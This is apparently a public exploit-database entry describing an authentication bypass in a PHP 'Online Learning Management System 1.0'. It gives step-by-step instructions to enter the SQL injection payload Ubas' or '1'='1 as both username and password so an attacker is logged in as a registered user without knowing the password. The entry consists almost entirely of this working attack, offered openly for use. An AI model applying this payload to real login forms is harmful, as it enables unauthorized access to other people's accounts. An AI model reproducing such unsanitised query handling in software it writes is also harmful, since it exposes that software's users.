# Exploit Title: Online Learning Management System 1.0 - Authentication Bypass
# Exploit Author: Aakash Madaan (Godsky)
# Date: 2020-12-22
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
# Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as the registered user without password.
Step 1: Go to http://localhost/ and register a new user or try to login as
already registered user (Ubas).
Step 2: On the login page, use query { Ubas' or '1'='1 } as username
Step 2: On the login page, use same query { Ubas' or '1'='1 } as password
All set you should be logged in as Ubas.